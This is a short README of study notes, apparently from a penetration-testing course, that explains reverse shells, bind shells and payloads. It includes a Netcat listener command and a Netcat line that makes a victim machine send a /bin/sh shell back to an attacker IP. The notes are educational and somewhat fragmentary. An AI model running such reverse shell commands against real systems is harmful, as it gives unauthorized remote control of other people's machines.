Jay-Idrees/UPenn-CyberSecurity-Penetration-Testing/README.md

 - Alternatively a bin shell means that we connect to a target - usually used when reverse shell is not working
 - poping a shell means gaining access to a machine

-**Reverse Shell**
--`nc -nvlp 4444` attack box (lvp means listening verbose port) -`nc 192.168.1.1 4444 -e /bin/sh` This is telling the victim machine to connect to the ip address of my attack machine
-- Whenever a victim connects back to

-**Bin shell**
-- You send an exploit to the victim's machine and then open a port there.
-Next you connect to it via your attacking VM once the port is established.
-All of this is done using Netcat

 **Payload** it is the exploit- there are various different options.
 You send it to a victim and then attempt to open a shell in the victim.
 It is either staged or unstaged
 - Windows type